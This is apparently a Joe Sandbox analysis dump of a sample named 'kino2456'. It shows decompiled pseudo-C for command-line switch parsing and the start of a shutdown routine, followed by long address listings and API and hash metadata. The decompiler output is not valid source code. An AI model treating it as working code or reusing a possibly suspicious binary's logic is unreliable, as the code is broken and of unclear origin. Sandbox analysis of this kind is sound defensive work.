				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x968004; // 0xf4cc89a0
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00966CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00966E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x968004; // 0xf4cc89a0
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0096597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E009644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x969124 = E00966285();
									_t75 = 0;
								}
								return E00966CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E009644B9(0, 0x521, 0x961140, 0, 0x40, 0);
												_t85 =  *0x968588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0096667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0096667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00965C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00961680(0x968c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0096667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0096667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x968a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00965C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x968b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x968a3a;
																}
																E00961680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0096658A(_t218, 0x104, 0x961140);
																if(E009631E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x968a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x968a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x968a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x968a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x968a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x969a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x969a2c =  *0x969a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x968d48 =  *0x968d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x969a2c =  *0x969a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x969a2c =  *0x969a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x968d48 =  *0x968d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x969a2c =  *0x969a2c | 0x00000004;
																										L70:
																										 *0x968a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x969a2c = 3;
																	 *0x968a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x968a2c != 0 &&  *0x968b3e == 0) {
						if(GetModuleFileNameA( *0x969a3c, 0x968b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E009666C8(0x968b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                    0x00965c9e
                                                                                                                                                                                                                                    0x00965ca9
                                                                                                                                                                                                                                    0x00965cb0
                                                                                                                                                                                                                                    0x00965cb3
                                                                                                                                                                                                                                    0x00965cb6
                                                                                                                                                                                                                                    0x00965cb7
                                                                                                                                                                                                                                    0x00965cb8
                                                                                                                                                                                                                                    0x00965cbd
                                                                                                                                                                                                                                    0x00966204
                                                                                                                                                                                                                                    0x00965ccb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ccb
                                                                                                                                                                                                                                    0x00965cd3
                                                                                                                                                                                                                                    0x00965cd7
                                                                                                                                                                                                                                    0x00965cf4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965cf4
                                                                                                                                                                                                                                    0x00965cf8
                                                                                                                                                                                                                                    0x00965d00
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d06
                                                                                                                                                                                                                                    0x00965d06
                                                                                                                                                                                                                                    0x00965d0e
                                                                                                                                                                                                                                    0x00965d10
                                                                                                                                                                                                                                    0x00965d12
                                                                                                                                                                                                                                    0x00965d14
                                                                                                                                                                                                                                    0x00965d15
                                                                                                                                                                                                                                    0x00965d17
                                                                                                                                                                                                                                    0x00965d49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d19
                                                                                                                                                                                                                                    0x00965d19
                                                                                                                                                                                                                                    0x00965d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d3f
                                                                                                                                                                                                                                    0x00965d3f
                                                                                                                                                                                                                                    0x00965d4b
                                                                                                                                                                                                                                    0x00965d4b
                                                                                                                                                                                                                                    0x00965d4f
                                                                                                                                                                                                                                    0x00965d8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d93
                                                                                                                                                                                                                                    0x00965d93
                                                                                                                                                                                                                                    0x00965d9a
                                                                                                                                                                                                                                    0x00965d9d
                                                                                                                                                                                                                                    0x00965d9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d9e
                                                                                                                                                                                                                                    0x00965d51
                                                                                                                                                                                                                                    0x00965d5b
                                                                                                                                                                                                                                    0x00965d72
                                                                                                                                                                                                                                    0x009660fb
                                                                                                                                                                                                                                    0x009660fb
                                                                                                                                                                                                                                    0x00966207
                                                                                                                                                                                                                                    0x0096620a
                                                                                                                                                                                                                                    0x0096620b
                                                                                                                                                                                                                                    0x0096620e
                                                                                                                                                                                                                                    0x00966217
                                                                                                                                                                                                                                    0x00965d78
                                                                                                                                                                                                                                    0x00965d78
                                                                                                                                                                                                                                    0x00965d80
                                                                                                                                                                                                                                    0x00965d83
                                                                                                                                                                                                                                    0x00965d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d84
                                                                                                                                                                                                                                    0x00965d5d
                                                                                                                                                                                                                                    0x00965d5f
                                                                                                                                                                                                                                    0x00965d62
                                                                                                                                                                                                                                    0x00965d68
                                                                                                                                                                                                                                    0x00965d64
                                                                                                                                                                                                                                    0x00965d64
                                                                                                                                                                                                                                    0x00965d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d62
                                                                                                                                                                                                                                    0x00965d5b
                                                                                                                                                                                                                                    0x00965d4f
                                                                                                                                                                                                                                    0x00965d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d9f
                                                                                                                                                                                                                                    0x00965d9f
                                                                                                                                                                                                                                    0x00965da5
                                                                                                                                                                                                                                    0x00965dab
                                                                                                                                                                                                                                    0x00965dba
                                                                                                                                                                                                                                    0x00966218
                                                                                                                                                                                                                                    0x0096621d
                                                                                                                                                                                                                                    0x00966220
                                                                                                                                                                                                                                    0x00966221
                                                                                                                                                                                                                                    0x00966229
                                                                                                                                                                                                                                    0x00966230
                                                                                                                                                                                                                                    0x00966247
                                                                                                                                                                                                                                    0x0096626a
                                                                                                                                                                                                                                    0x00966272
                                                                                                                                                                                                                                    0x00966249
                                                                                                                                                                                                                                    0x00966255
                                                                                                                                                                                                                                    0x0096625f
                                                                                                                                                                                                                                    0x00966264
                                                                                                                                                                                                                                    0x00966264
                                                                                                                                                                                                                                    0x00966284
                                                                                                                                                                                                                                    0x00965dc0
                                                                                                                                                                                                                                    0x00965dc0
                                                                                                                                                                                                                                    0x00965dca
                                                                                                                                                                                                                                    0x00965e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965dcc
                                                                                                                                                                                                                                    0x00965dce
                                                                                                                                                                                                                                    0x00965e24
                                                                                                                                                                                                                                    0x00965e24
                                                                                                                                                                                                                                    0x00965e2c
                                                                                                                                                                                                                                    0x00965e47
                                                                                                                                                                                                                                    0x00965e4a
                                                                                                                                                                                                                                    0x009661d2
                                                                                                                                                                                                                                    0x009661e2
                                                                                                                                                                                                                                    0x009661e7
                                                                                                                                                                                                                                    0x009661ee
                                                                                                                                                                                                                                    0x009661f1
                                                                                                                                                                                                                                    0x009661f1
                                                                                                                                                                                                                                    0x009661f8
                                                                                                                                                                                                                                    0x009661f8
                                                                                                                                                                                                                                    0x00965e50
                                                                                                                                                                                                                                    0x00965e53
                                                                                                                                                                                                                                    0x00966109
                                                                                                                                                                                                                                    0x0096611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966125
                                                                                                                                                                                                                                    0x00966137
                                                                                                                                                                                                                                    0x0096613a
                                                                                                                                                                                                                                    0x0096613c
                                                                                                                                                                                                                                    0x0096613e
                                                                                                                                                                                                                                    0x0096613e
                                                                                                                                                                                                                                    0x00966141
                                                                                                                                                                                                                                    0x00966141
                                                                                                                                                                                                                                    0x00966143
                                                                                                                                                                                                                                    0x00966144
                                                                                                                                                                                                                                    0x0096614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966150
                                                                                                                                                                                                                                    0x00966152
                                                                                                                                                                                                                                    0x0096615c
                                                                                                                                                                                                                                    0x00966170
                                                                                                                                                                                                                                    0x00966172
                                                                                                                                                                                                                                    0x0096617c
                                                                                                                                                                                                                                    0x00966190
                                                                                                                                                                                                                                    0x00966190
                                                                                                                                                                                                                                    0x00966196
                                                                                                                                                                                                                                    0x009661a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009661ab
                                                                                                                                                                                                                                    0x009661b9
                                                                                                                                                                                                                                    0x009661c6
                                                                                                                                                                                                                                    0x009661c6
                                                                                                                                                                                                                                    0x0096617e
                                                                                                                                                                                                                                    0x00966180
                                                                                                                                                                                                                                    0x0096618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096618a
                                                                                                                                                                                                                                    0x0096615e
                                                                                                                                                                                                                                    0x00966160
                                                                                                                                                                                                                                    0x0096616a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096616a
                                                                                                                                                                                                                                    0x0096615c
                                                                                                                                                                                                                                    0x0096614a
                                                                                                                                                                                                                                    0x0096610b
                                                                                                                                                                                                                                    0x0096610e
                                                                                                                                                                                                                                    0x0096610e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e59
                                                                                                                                                                                                                                    0x00965e59
                                                                                                                                                                                                                                    0x00965e5c
                                                                                                                                                                                                                                    0x0096604f
                                                                                                                                                                                                                                    0x00966056
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096605c
                                                                                                                                                                                                                                    0x0096606e
                                                                                                                                                                                                                                    0x00966071
                                                                                                                                                                                                                                    0x00966073
                                                                                                                                                                                                                                    0x00966075
                                                                                                                                                                                                                                    0x00966075
                                                                                                                                                                                                                                    0x00966078
                                                                                                                                                                                                                                    0x00966078
                                                                                                                                                                                                                                    0x0096607a
                                                                                                                                                                                                                                    0x0096607b
                                                                                                                                                                                                                                    0x00966081
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966087
                                                                                                                                                                                                                                    0x00966087
                                                                                                                                                                                                                                    0x0096608d
                                                                                                                                                                                                                                    0x0096609c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009660a2
                                                                                                                                                                                                                                    0x009660aa
                                                                                                                                                                                                                                    0x009660b2
                                                                                                                                                                                                                                    0x009660b7
                                                                                                                                                                                                                                    0x009660bd
                                                                                                                                                                                                                                    0x009660bf
                                                                                                                                                                                                                                    0x009660bf
                                                                                                                                                                                                                                    0x009660d6
                                                                                                                                                                                                                                    0x009660e0
                                                                                                                                                                                                                                    0x009660e7
                                                                                                                                                                                                                                    0x009660f5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009660f5
                                                                                                                                                                                                                                    0x0096609c
                                                                                                                                                                                                                                    0x00966081
                                                                                                                                                                                                                                    0x00965e62
                                                                                                                                                                                                                                    0x00965e62
                                                                                                                                                                                                                                    0x00965e65
                                                                                                                                                                                                                                    0x00965fd3
                                                                                                                                                                                                                                    0x00965fe9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fef
                                                                                                                                                                                                                                    0x00965fef
                                                                                                                                                                                                                                    0x00965ff7
                                                                                                                                                                                                                                    0x00965ffd
                                                                                                                                                                                                                                    0x00966003
                                                                                                                                                                                                                                    0x00966006
                                                                                                                                                                                                                                    0x00966011
                                                                                                                                                                                                                                    0x00966014
                                                                                                                                                                                                                                    0x0096603d
                                                                                                                                                                                                                                    0x00966016
                                                                                                                                                                                                                                    0x00966018
                                                                                                                                                                                                                                    0x00966019
                                                                                                                                                                                                                                    0x0096601b
                                                                                                                                                                                                                                    0x00966033
                                                                                                                                                                                                                                    0x0096601d
                                                                                                                                                                                                                                    0x00966020
                                                                                                                                                                                                                                    0x00966029
                                                                                                                                                                                                                                    0x00966022
                                                                                                                                                                                                                                    0x00966022
                                                                                                                                                                                                                                    0x00966022
                                                                                                                                                                                                                                    0x00966020
                                                                                                                                                                                                                                    0x0096601b
                                                                                                                                                                                                                                    0x00966042
                                                                                                                                                                                                                                    0x00966044
                                                                                                                                                                                                                                    0x00966046
                                                                                                                                                                                                                                    0x0096604a
                                                                                                                                                                                                                                    0x00965ff7
                                                                                                                                                                                                                                    0x00965fd5
                                                                                                                                                                                                                                    0x00965fd8
                                                                                                                                                                                                                                    0x00965fd8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e6b
                                                                                                                                                                                                                                    0x00965e6b
                                                                                                                                                                                                                                    0x00965e6e
                                                                                                                                                                                                                                    0x00965f8b
                                                                                                                                                                                                                                    0x00965f99
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965f9f
                                                                                                                                                                                                                                    0x00965fa7
                                                                                                                                                                                                                                    0x00965faf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fb1
                                                                                                                                                                                                                                    0x00965fb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fb5
                                                                                                                                                                                                                                    0x00965fb7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fb9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965fb9
                                                                                                                                                                                                                                    0x00965fb7
                                                                                                                                                                                                                                    0x00965fb3
                                                                                                                                                                                                                                    0x00965faf
                                                                                                                                                                                                                                    0x00965f8d
                                                                                                                                                                                                                                    0x00965f8d
                                                                                                                                                                                                                                    0x00965f8d
                                                                                                                                                                                                                                    0x00965f8f
                                                                                                                                                                                                                                    0x00965fc1
                                                                                                                                                                                                                                    0x00965fc1
                                                                                                                                                                                                                                    0x00965fc1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e74
                                                                                                                                                                                                                                    0x00965e74
                                                                                                                                                                                                                                    0x00965e77
                                                                                                                                                                                                                                    0x00965ea0
                                                                                                                                                                                                                                    0x00965ebd
                                                                                                                                                                                                                                    0x00965f79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965f7f
                                                                                                                                                                                                                                    0x00965ec3
                                                                                                                                                                                                                                    0x00965ec3
                                                                                                                                                                                                                                    0x00965ecc
                                                                                                                                                                                                                                    0x00965ed4
                                                                                                                                                                                                                                    0x00965ed6
                                                                                                                                                                                                                                    0x00965edc
                                                                                                                                                                                                                                    0x00965edf
                                                                                                                                                                                                                                    0x00965eea
                                                                                                                                                                                                                                    0x00965eed
                                                                                                                                                                                                                                    0x00965f3f
                                                                                                                                                                                                                                    0x00965f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965eef
                                                                                                                                                                                                                                    0x00965eef
                                                                                                                                                                                                                                    0x00965ef2
                                                                                                                                                                                                                                    0x00965f34
                                                                                                                                                                                                                                    0x00965ef4
                                                                                                                                                                                                                                    0x00965ef4
                                                                                                                                                                                                                                    0x00965ef7
                                                                                                                                                                                                                                    0x00965f2b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965ef9
                                                                                                                                                                                                                                    0x00965ef9
                                                                                                                                                                                                                                    0x00965efc
                                                                                                                                                                                                                                    0x00965f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965efe
                                                                                                                                                                                                                                    0x00965eff
                                                                                                                                                                                                                                    0x00965f02
                                                                                                                                                                                                                                    0x00965f16
                                                                                                                                                                                                                                    0x00965f04
                                                                                                                                                                                                                                    0x00965f07
                                                                                                                                                                                                                                    0x00965f0d
                                                                                                                                                                                                                                    0x00965f46
                                                                                                                                                                                                                                    0x00965f46
                                                                                                                                                                                                                                    0x00965f09
                                                                                                                                                                                                                                    0x00965f09
                                                                                                                                                                                                                                    0x00965f09
                                                                                                                                                                                                                                    0x00965f07
                                                                                                                                                                                                                                    0x00965f02
                                                                                                                                                                                                                                    0x00965efc
                                                                                                                                                                                                                                    0x00965ef7
                                                                                                                                                                                                                                    0x00965ef2
                                                                                                                                                                                                                                    0x00965f4c
                                                                                                                                                                                                                                    0x00965f4e
                                                                                                                                                                                                                                    0x00965f50
                                                                                                                                                                                                                                    0x00965f54
                                                                                                                                                                                                                                    0x00965ed4
                                                                                                                                                                                                                                    0x00965ea2
                                                                                                                                                                                                                                    0x00965ea4
                                                                                                                                                                                                                                    0x00965eaf
                                                                                                                                                                                                                                    0x00965eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e79
                                                                                                                                                                                                                                    0x00965e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e83
                                                                                                                                                                                                                                    0x00965e83
                                                                                                                                                                                                                                    0x00965e83
                                                                                                                                                                                                                                    0x00965e85
                                                                                                                                                                                                                                    0x00965e85
                                                                                                                                                                                                                                    0x00965e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965e94
                                                                                                                                                                                                                                    0x00965e8e
                                                                                                                                                                                                                                    0x00965e7d
                                                                                                                                                                                                                                    0x00965e77
                                                                                                                                                                                                                                    0x00965e6e
                                                                                                                                                                                                                                    0x00965e65
                                                                                                                                                                                                                                    0x00965e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965dd0
                                                                                                                                                                                                                                    0x00965dd0
                                                                                                                                                                                                                                    0x00965dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965dd0
                                                                                                                                                                                                                                    0x00965dce
                                                                                                                                                                                                                                    0x00965dca
                                                                                                                                                                                                                                    0x00965dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965d00
                                                                                                                                                                                                                                    0x00965dd9
                                                                                                                                                                                                                                    0x00965e04
                                                                                                                                                                                                                                    0x009661fe
                                                                                                                                                                                                                                    0x00965e0a
                                                                                                                                                                                                                                    0x00965e0c
                                                                                                                                                                                                                                    0x00965e17
                                                                                                                                                                                                                                    0x00965e17
                                                                                                                                                                                                                                    0x00965e04
                                                                                                                                                                                                                                    0x00966200
                                                                                                                                                                                                                                    0x00966200
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00965CEE
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00968B3E,00000104,00000000,?,?), ref: 00965DFC
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00965E3E
                                                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00965EE1
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00965F6F
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00965FA7
                                                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00966008
                                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 009660AA
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00961140,00000000,00000040,00000000), ref: 009661F1
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 009661F8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                    • Opcode ID: f7984660e33b64daad4ccb6829872d1a9cb669e4a743369a4c9b8d77e31f9dae
                                                                                                                                                                                                                                    • Instruction ID: 7891326f10b5458f7baa0dd9481cdc8e7cd6225784d8a79f85935d6c85fea4cd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7984660e33b64daad4ccb6829872d1a9cb669e4a743369a4c9b8d77e31f9dae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5D1A071A0CA446FDF35CB389C583BA3BADAB56304F1605AEC4C6D61D1DAB58E82DF40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00961F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                                                    			E00961F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x969a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x968004; // 0xf4cc89a0
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
